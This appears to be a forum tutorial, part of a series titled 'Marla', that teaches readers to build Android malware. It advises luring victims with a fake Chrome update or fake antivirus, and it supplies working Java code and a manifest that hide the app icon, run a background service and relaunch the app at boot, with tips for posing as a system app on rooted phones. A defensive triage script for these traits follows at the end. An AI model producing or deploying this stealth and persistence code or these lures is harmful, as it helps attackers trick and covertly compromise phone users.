Android Malware : A tumor called Marla 0x02

A Tumor Called Marla


Hi everyone, today we will cover how to hide our malware from the user and run it as a service.
When the malware runs for the first time, it will hide the app icon from the user's launcher and run a service.
The service only queries the OS version for the moment; we will be much more malicious in the next tutorial.

How to infect the user?


When the user installs the malware, we want it to be persistent.
We need to force the user to install our malware and run it, but how?

Social Engineering

Here is one of the ways to force the user to download Marla:
a fake Chrome update (everyone uses Chrome on Android, or at least most users) or a fake antivirus (a phishing page telling the user they have 10 viruses, tricking them into downloading your “Antivirus”).

If you choose the antivirus way, make an app that looks like a legit antivirus.
When the user downloads the app, installs it and runs it, we are good.

Why should we use these techniques?

On newer versions of Android, an app needs to be run once before it can be started at boot time and use its permissions (see Android Malware for more information about permissions).

Hiding app icon

Let’s start coding and hide our app icon.

Today our task is to disable the app component of our application, here the icon. (You can start from scratch or use the code from the previous tutorial.)

N.B.: The app won’t be persistent if the user's phone isn't rooted; the user will be able to uninstall the malware. However, if the Android phone is rooted, we can hide the app as a system app and give it a name like com.android.update; the user won’t be able to uninstall a system app.

Main Activity

package com.android.marla;

import android.content.pm.PackageManager;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        PackageManager pm = this.getPackageManager();
        //The line below will hide your app icon
        pm.setComponentEnabledSetting(
                getComponentName(),
                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
                PackageManager.DONT_KILL_APP);
        //Just show a Toast
        Toast.makeText(this, "Updating your system please wait ...", Toast.LENGTH_LONG);


    }
}



Here is what you should see

Now if you kill the app after a moment.

No Marla app.

Run a service

We want a running service that can gather information. Let’s make a new class:

package com.android.marla;

import android.app.Service;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.support.annotation.Nullable;
import android.widget.Toast;

public class MainService extends Service{

    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }


    public void onCreate()
    {
        Handler handler = new Handler(Looper.getMainLooper());
        handler.post(new Runnable(){

            @Override
            public void run() {
                Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
            }
        });
    }

}

Here I just create a Toast as a PoC; here is the function:

 public void onCreate()
    {
        Handler handler = new Handler(Looper.getMainLooper());
        handler.post(new Runnable(){

            @Override
            public void run() {
                Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
            }
        });
    }

In your Android manifest, add the service:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.marla">
    <!--PERMISSION-->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <!--PERMISSION-->
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <!-- THE SERVICE IS BELOW-->
        <service android:name=".MainService"/>
    </application>

</manifest>

Well done! You’ve created a service; now let’s run it at boot time. (I hope you remember the previous tutorial for this part.)
Receiver:

package com.android.marla;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        /** if the boot is completed **/
        if(Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())){
            /** Start the MainActivity.class everytime the phone boot**/
            Intent i = new Intent(context, MainActivity.class);
            context.startActivity(i);
        }
    }
}

Well done. Your application is not malicious for the moment; it looks like adware.

10 Likes
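For defenders, the traits this post builds into the sample (the boot permission, a com.android.* package name, a launcher activity whose component is then disabled in code) can be checked statically. The triage script below is an added example, not part of the original post; it assumes a manifest already decoded to text (for example by apktool) and decompiled source as a string, and the finding names and the package-name rule are hypothetical.

```python
import re
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample: decoded manifest shaped like the one in the post.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.marla">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".MainService"/>
  </application>
</manifest>"""

# Constructed sample: the call from the post as it would appear in decompiled source.
SAMPLE_SOURCE = """pm.setComponentEnabledSetting(getComponentName(),
    PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);"""

DISABLE_CALL = re.compile(
    r"setComponentEnabledSetting\s*\([^;]*COMPONENT_ENABLED_STATE_DISABLED")


def triage(manifest_xml, source_text):
    """Return heuristic findings; each is a reason to look closer, not a verdict."""
    root = ET.fromstring(manifest_xml)  # for untrusted files prefer a hardened XML parser
    findings = []
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    if "android.permission.RECEIVE_BOOT_COMPLETED" in perms:
        findings.append("requests-boot-start")
    # Hypothetical rule: a sideloaded app claiming the platform's package namespace.
    if root.get("package", "").startswith("com.android."):
        findings.append("platform-like-package-name")
    has_launcher = any(
        c.get(A + "name") == "android.intent.category.LAUNCHER"
        for act in root.iter("activity") for c in act.iter("category"))
    # A launcher entry plus code that disables a component suggests icon hiding.
    if has_launcher and DISABLE_CALL.search(source_text):
        findings.append("may-hide-launcher-icon")
    return findings


if __name__ == "__main__":
    print(triage(SAMPLE_MANIFEST, SAMPLE_SOURCE))
```

Disabling a component is also done by legitimate apps, so the last finding is only raised when the manifest declares a launcher entry as well.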

Thanks for an article! Well done!

2 Likes
